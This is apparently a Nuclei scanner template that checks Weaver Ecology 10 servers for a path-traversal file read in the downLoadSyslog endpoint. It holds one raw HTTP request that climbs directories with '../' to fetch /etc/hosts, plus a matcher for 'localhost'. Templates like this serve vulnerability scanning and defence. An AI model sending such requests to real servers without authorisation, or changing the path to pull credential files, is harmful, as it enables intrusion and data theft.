id: ecology-10-downLoadSyslog-fileread
info:
  name: ecology-10-downLoadSyslog-fileread
  author: lemonlove7
  severity: high
http:
  - raw:
      - |-
        GET /papi/em/transform/downLoadSyslog?logPath=../../.././.././././../../etc/hosts HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Accept-Encoding: gzip, deflate
        Connection: keep-alive
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
    matchers:
      - type: word
        part: body
        words:
          - 'localhost'
    matchers-condition: and
